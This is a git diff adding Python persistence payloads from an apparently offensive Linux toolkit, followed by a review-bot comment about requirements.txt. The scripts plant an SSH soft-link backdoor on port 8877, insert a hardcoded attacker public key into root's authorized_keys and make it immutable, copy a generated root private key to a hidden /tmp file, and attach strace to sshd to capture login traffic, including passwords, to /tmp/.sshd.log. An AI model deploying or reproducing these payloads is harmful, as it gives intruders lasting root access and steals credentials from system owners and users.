/dev/null +++ b/payload/ssh_Soft_link/ssh_Soft_link.py 
@@ -0,0 +1,58 @@ +# coding=utf-8 +# !/usr/bin/env python +from __future__ import print_function +import subprocess +import socket + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def ssh(port): + command = 'ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=' + str(port) + ml(command) + host = '127.0.0.1' + # 创建套接字对象 + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + # 尝试连接到远程主机 + sock.connect((host, port)) + print("连接成功") + except Exception as e: + print("连接失败") + finally: + # 关闭套接字连接 + sock.close() + +def miyue(new_content): + filename = "/etc/ssh/sshd_config" + with open(filename, 'a') as file: + file.write(new_content + '\n') + + +if __name__ == '__main__': + command = 'cat /etc/ssh/sshd_config|grep UsePAM' + j = ml(command) + if 'UsePAM yes' in j: + print('可以使用SSH软链接后门,使用ps -aux关闭连接,删除/tmp/su文件') + port = 8877 + ssh(port) + else: + print('正在开启UsePAM') + miyue('UsePAM yes') + print('可以使用SSH软链接后门,使用ps -aux关闭连接,删除/tmp/su文件') + port = 8877 + ssh(port) diff --git a/payload/sshkey/sshkey_local.py b/payload/sshkey/sshkey_local.py new file mode 100644 index 0000000..a88a186 --- /dev/null +++ b/payload/sshkey/sshkey_local.py 
@@ -0,0 +1,62 @@ +# coding=utf-8 +# !/usr/bin/env python +from __future__ import print_function +import subprocess +import os + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def miyue(new_content): + filename = "/etc/ssh/sshd_config" + with open(filename, 'a') as file: + file.write(new_content + '\n') + + +def authorized_keys(new_content): + ssh_dir = "/root/.ssh" + authorized_keys_file = "/root/.ssh/authorized_keys" + # 创建.ssh目录(如果不存在) + if not os.path.exists(ssh_dir): + os.makedirs(ssh_dir) + # 创建authorized_keys文件(如果不存在) + if not os.path.exists(authorized_keys_file): + with open(authorized_keys_file, 'w') as file: + pass # 创建一个空文件 + # 将新内容追加到authorized_keys文件末尾 + with open(authorized_keys_file, 'a') as file: + file.write(new_content + '\n') + + +def file_key(): + file_path = "/root/.ssh/authorized_keys" + if os.path.exists(file_path): + print("文件写入成功") + else: + print("文件写入失败") + + +if __name__ == '__main__': + id_ed25519_pub = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDvfxeBxW8qqV4wfyMBylxVDyd/Cq9N8psk2zpwDf9SX kali@kali" + # 调用 miyue 函数来在文件末尾写入新内容 + # ssh-keygen -t ed25519 -N "admin!@#45123" + miyue("HostKey /etc/ssh/ssh_host_ed25519_key") + miyue("PubkeyAuthentication yes") + miyue("AuthorizedKeysFile .ssh/authorized_keys") + authorized_keys(id_ed25519_pub) + ml('chattr +i /root/.ssh && chattr +i /root/.ssh/authorized_keys') + file_key() diff --git a/payload/sshkey/sshkey_target.py b/payload/sshkey/sshkey_target.py new file mode 100644 index 0000000..87f98e8 --- /dev/null +++ b/payload/sshkey/sshkey_target.py 
@@ -0,0 +1,60 @@ +# coding=utf-8 +# !/usr/bin/env python +from __future__ import print_function +import subprocess +import os + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def miyue(new_content): + filename = "/etc/ssh/sshd_config" + with open(filename, 'a') as file: + file.write(new_content + '\n') + + +def generate_ssh_key(password): + command = 'ssh-keygen -t ed25519 -N "' + password + '" -q -f /root/.ssh/id_ed25519' + # 连接PubkeyAcceptedKeyTypes=+ssh-rsa + p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + output, error = p.communicate() + + if p.returncode == 0: + print("SSH密钥生成成功!") + else: + print("SSH密钥生成失败。错误信息:") + print(error.decode()) + +def file_key(): + file_path = "/root/.ssh/authorized_keys" + if os.path.exists(file_path): + print("文件写入成功") + else: + print("文件写入失败") + + +if __name__ == '__main__': + # 调用 miyue 函数来在文件末尾写入新内容 + miyue("HostKey /etc/ssh/ssh_host_ed25519_key") + miyue("PubkeyAuthentication yes") + miyue("AuthorizedKeysFile .ssh/authorized_keys") + # 调用 generate_ssh_key 函数生成SSH密钥对 + password = "admin!@#45123" + generate_ssh_key(password) + ml('cat /root/.ssh/id_ed25519.pub >> /root/.ssh/authorized_keys && chmod 600 /root/.ssh/authorized_keys && chmod 700 /root/.ssh/') + ml('cp /root/.ssh/id_ed25519 /tmp/.11') + ml('chattr +i /root/.ssh && chattr +i /root/.ssh/authorized_keys') + file_key() diff --git a/payload/strace/sshd.py b/payload/strace/sshd.py new file mode 100644 index 0000000..e9d29ef --- /dev/null +++ b/payload/strace/sshd.py 
@@ -0,0 +1,31 @@ +# coding=utf-8 +from __future__ import print_function +import subprocess +import os + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + +def check_strace(): + j = ml('strace -V') + if 'strace -- version' in j: + print('成功') + else: + print('失败') + +if __name__ == '__main__': + os.system("""(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)""") + os.system("""(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 4096 2> /tmp/.sshd.log &)""") + check_strace() diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..7e8be38 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,3 @@ +colorama +termcolor +argparse
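Review bot: requirements.txt lists `argparse`, which has been part of the standard library since Python 2.7/3.2; installing it pulls the long-unmaintained PyPI backport beside the stdlib module it duplicates, adding a supply-chain dependency for no benefit. Remove that line and pin the remaining entries (`colorama`, `termcolor`) to the versions this was tested with, ideally with `==` and hashes if the tool is meant to be installed on hosts you do not control.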